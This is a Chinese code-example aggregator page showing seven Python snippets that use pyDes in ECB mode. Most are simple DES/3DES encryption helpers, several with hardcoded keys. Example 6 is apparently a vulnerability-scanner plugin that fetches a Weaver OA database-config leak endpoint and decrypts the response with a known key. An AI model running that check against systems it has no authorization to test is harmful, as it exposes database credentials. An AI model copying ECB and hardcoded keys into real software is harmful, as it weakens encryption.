本文整理匯總了Python中pyDes.ECB屬性的典型用法代碼示例。如果您正苦於以下問題:Python pyDes.ECB屬性的具體用法?Python pyDes.ECB怎麽用?Python pyDes.ECB使用的例子?那麽, 這裏精選的屬性代碼示例或許可以為您提供幫助。您也可以進一步了解該屬性所在類pyDes
的用法示例。
在下文中一共展示了pyDes.ECB屬性的7個代碼示例,這些例子默認根據受歡迎程度排序。您可以為喜歡或者感覺有用的代碼點讚,您的評價將有助於係統推薦出更棒的Python代碼示例。
示例1: main
# 需要導入模塊: import pyDes [as 別名]
# 或者: from pyDes import ECB [as 別名]
def main():
if len(sys.argv) != 2:
print 'Usage: %s <encrypted_message>'
sys.exit(-1)
original_data = sys.argv[1]
session_key = '%d' % sum([int(c) for c in original_data[:10]])
key = session_key + 'dksyel'
encrypted_data = original_data[10:]
des_cryptor = pyDes.des(key, pyDes.ECB, padmode=pyDes.PAD_PKCS5)
plaintext = des_cryptor.decrypt(base64.b64decode(encrypted_data))
print plaintext
示例2: unobscure
# 需要導入模塊: import pyDes [as 別名]
# 或者: from pyDes import ECB [as 別名]
def unobscure(s=""):
engine = triple_des(salt, ECB, pad=None, padmode=PAD_PKCS5)
cipher = triple_des(salt)
decrypted = cipher.decrypt(base64.b64decode(s), padmode=PAD_PKCS5)
return decrypted.decode()
示例3: obscure
# 需要導入模塊: import pyDes [as 別名]
# 或者: from pyDes import ECB [as 別名]
def obscure(data, encode_salt):
engine = triple_des(encode_salt, ECB, pad=None, padmode=PAD_PKCS5)
data = data.encode('ascii')
en_data = engine.encrypt(data)
return base64.b64encode(en_data)
示例4: unobscure
# 需要導入模塊: import pyDes [as 別名]
# 或者: from pyDes import ECB [as 別名]
def unobscure(self,s=""):
engine = pyDes.triple_des(self.key, pyDes.ECB, pad=None, padmode=pyDes.PAD_PKCS5)
cipher = pyDes.triple_des(self.key)
decrypted = cipher.decrypt(base64.b64decode(s), padmode=pyDes.PAD_PKCS5)
return decrypted
示例5: des_encrypt_string
# 需要導入模塊: import pyDes [as 別名]
# 或者: from pyDes import ECB [as 別名]
def des_encrypt_string(DEVICE_ID):
# We only need the first 8 characters of the encryption key
# Found in co.vmob.sdk.util.Utils.java
key = 'co.vmob.sdk.android.encrypt.key'.encode()[:8]
# The encryption prefix
encryption_prefix = 'co.vmob.android.sdk.'
# Now the encryption part
cipher = pyDes.des(key, pyDes.ECB, pad=None, padmode=pyDes.PAD_PKCS5)
encrypted_message = cipher.encrypt(encryption_prefix + DEVICE_ID)
# Return the encrypted message base64 encoded and "decoded" so it is a string, not bytes.
return base64.b64encode(encrypted_message).replace(b"/", b"_").decode() + "_"
# Encryption key used for the TSSA
示例6: medusa
# 需要導入模塊: import pyDes [as 別名]
# 或者: from pyDes import ECB [as 別名]
def medusa(Url,RandomAgent,proxies=None,**kwargs):
proxies=ClassCongregation.Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/mobile/DBconfigReader.jsp"
payload_url = scheme + "://" + url +":"+ str(port) + payload
key = '1z2x3c4v5b6n'[0:8]
headers = {
'User-Agent': RandomAgent,
'Content-Type': 'application/x-www-form-urlencoded',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
s = requests.session()
resp = s.get(payload_url,headers=headers, timeout=6,proxies=proxies, verify=False)
con=resp.text
dec=resp.content[10:]
resph= resp.headers.get('Set-Cookie')
code = resp.status_code
if code == 200 and resp.headers['Content-Type']=='text/html; charset=UTF-8' and resph.find('ecology') != -1 :
k = pyDes.des(key, pyDes.ECB, '\0' * 8, pad=None, padmode=pyDes.PAD_PKCS5)
decs=k.decrypt(dec)
Medusa = "{} 存在泛微OA_數據庫配置信息泄露驗證數據:\r\nUrl:{}\r\n返回數據:{}\r\n解密數據:{}".format(url,payload_url,con,decs)
_t=VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write() # 傳入url和掃描到的數據
ClassCongregation.WriteFile().result(str(url),str(Medusa))#寫入文件,url為目標文件名統一傳入,Medusa為結果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#調用寫入類
示例7: encryptDES_ECB
# 需要導入模塊: import pyDes [as 別名]
# 或者: from pyDes import ECB [as 別名]
def encryptDES_ECB(data, key):
data = data.encode()
k = pyDes.des(key, pyDes.ECB, IV=None, pad=None, padmode=pyDes.PAD_PKCS5)
d = k.encrypt(data)
assert k.decrypt(d, padmode=pyDes.PAD_PKCS5) == data
return d